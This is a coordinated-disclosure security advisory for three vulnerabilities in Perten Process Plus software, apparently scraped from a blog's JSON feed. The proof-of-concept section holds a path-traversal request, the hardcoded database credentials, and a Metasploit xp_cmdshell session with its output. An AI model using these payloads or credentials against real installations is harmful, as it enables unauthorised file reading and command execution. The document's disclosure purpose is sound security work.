CyberDanube Security Research 20240722-0
——————————————————————————-
title| Multiple Vulnerabilities
product| Perten Instruments Process Plus Software
vulnerable version| <=1.11.6507.0
fixed version| 2.0.0
CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913
impact| High
homepage| https:\/\/perkinelmer.com
found| 2024-04-24
by| S. Dietz, T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. P\u00f6lten
|
| https:\/\/www.cyberdanube.com
——————————————————————————-<\/p>\n
Vendor description
——————————————————————————-
“For 85 years, PerkinElmer has pushed the boundaries of science from food to
health to the environment. We\u0092ve always pursued science with a clear purpose \u0096
to help our customers achieve theirs. Our expert team brings technology and
intangibles, like creativity, empathy, diligence, and a spirit of
collaboration, in equal measure, to fulfill our customers\u0092 desire to work
better, innovate better, and create better.<\/p>\n
PerkinElmer is a leading, global provider of technology and service solutions
that help customers measure, quantify, detect, and report in ways that help
ensure the quality, safety, and satisfaction of their products.”<\/p>\n
Source: https:\/\/www.perkinelmer.com\/<\/p>\n
Vulnerable versions
——————————————————————————-
ProcessPlus Software \/ <=1.11.6507.0<\/p>\n
Vulnerability overview
——————————————————————————-
1) Unauthenticated Local File Inclusion (CVE-2024-6911)
A LFI was identified in the web interface of the device. An attacker can use
this vulnerability to read system-wide files and configuration.<\/p>\n
2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations.
In combination with 3), this allows an attacker to fully compromise the host.<\/p>\n
3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user “sa” to connect to the database. Access to this
account allows an attacker to execute commands via the “xp_cmdshell” procedure.<\/p>\n
Proof of Concept
——————————————————————————-
1) Unauthenticated Local File Inclusion (CVE-2024-6911)
The LFI can be triggered by using the following GET Request:
——————————————————————————-
GET \/ProcessPlus\/Log\/Download\/?filename=..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP\/1.1
Host: 192.168.0.1
Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
——————————————————————————-
This example returns the content from “C:\\Windows\\System32\\drivers\\etc\\hosts”
of an affected installation.<\/p>\n
2) Hardcoded MSSQL Credentials (CVE-2024-6912)
Analysis across multiple installations show that the configuration file
“\\ProgramData\\Perten\\ProcessPlus\\OPCDA_SERVER.xml” contains credentials:
——————————————————————————-
[…]<OPCDA_Server dbconnectstring=”Driver={SQL Server};SERVER=.\\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno” application_id=”1″
appid=”Perten.OPCDA.Server” loglevel=”info”
logfile=”C:\\Perten\\ProcessPlus\\Log\\opcserver.log”>
[…]——————————————————————————-
These credentials “sa:enilno” were re-used in all reviewed installations.<\/p>\n
3) Execution with Unnecessary Privileges (CVE-2024-6913)
The application uses the “sa” user to authenticate with the database. By using
Metasploit an attacker can execute arbitrary commands:
——————————————————————————-
msf6 auxiliary(admin\/mssql\/mssql_exec) > show options<\/p>\n
Module options (auxiliary\/admin\/mssql\/mssql_exec):<\/p>\n
Name Current Setting
—- —————
CMD dir
PASSWORD enilno
RHOSTS 192.168.0.1
RPORT 1433
TDSENCRYPTION false
TECHNIQUE xp_cmdshell
USERNAME sa
USE_WINDOWS_AUTHENT false<\/p>\n
msf6 auxiliary(admin\/mssql\/mssql_exec) > run
[*] Running module against 192.168.0.1<\/p>\n[*] 192.168.0.1:1433 – SQL Query: EXEC master..xp_cmdshell ‘dir’<\/p>\n[…]Directory of C:\\Windows\\system32
01\/23\/2024 13:37 AM <DIR> .
01\/23\/2024 13:37 AM <DIR> ..
01\/23\/2024 13:37 AM <DIR> 0123
01\/23\/2024 13:37 AM <DIR> 0123
01\/23\/2024 13:37 AM 232 @AppHelpToast.png
01\/23\/2024 13:37 AM 308 @AudioToastIcon.png
[…]\n
Solution
——————————————————————————-
Update to version 2.0.0.<\/p>\n
Workaround
——————————————————————————-
Restrict network access to the host with the installed software. Change the
default credentials of the database in the config file and the database itself.<\/p>\n
Recommendation
——————————————————————————-
CyberDanube recommends Perten customers to upgrade the software to the latest
version available and to restrict network access to the management interface.<\/p>\n
Contact Timeline
——————————————————————————-
2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.
2024-05-13: Vendor asked for unencrypted advisory.
2024-05-16: Sent advisory to vendor.
2024-05-22: Asked for status update. No answer.
2024-05-28: Asked for status update. Contact stated that they are working on a
fix.
2024-06-10: Asked for status update. Contact stated that all issues should be
fixed by end of month. Local file inclusion should be fixed in
version 1.16. Asked for a release date of version 1.16. No answer.
2024-07-13: Asked for status update.
2024-07-15: Contact stated, that all three issues have been fixed in version
2.0.0 which have been released on 2024-07-11.
2024-07-16: Asked for a link to the firmware update release.
2024-07-17: Set release date to 2024-07-22.
2024-07-22: Coordinated release of security advisory.<\/p>\n
Web: https:\/\/www.cyberdanube.com
Twitter: https:\/\/twitter.com\/cyberdanube
Mail: research at cyberdanube dot com<\/p>\n
EOF S. Dietz, T. Weber \/ @2024<\/p>\n","protected":false},"excerpt":{"rendered":"
CyberDanube Security Research 20240722-0——————————————————————————-title| Multiple Vulnerabilitiesproduct| Perten Instruments Process Plus Softwarevulnerable version| <=1.11.6507.0fixed version| 2.0.0CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913impact| Highhomepage| https:\/\/perkinelmer.comfound| 2024-04-24by| S. Dietz, T. Weber (Office Vienna)| CyberDanube Security Research| Vienna | St. P\u00f6lten|| https:\/\/www.cyberdanube.com——————————————————————————- Vendor description——————————————————————————-“For 85 years, PerkinElmer has pushed the boundaries of science from food tohealth to the environment. We\u0092ve always …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58393","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58393","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58393"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58393\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}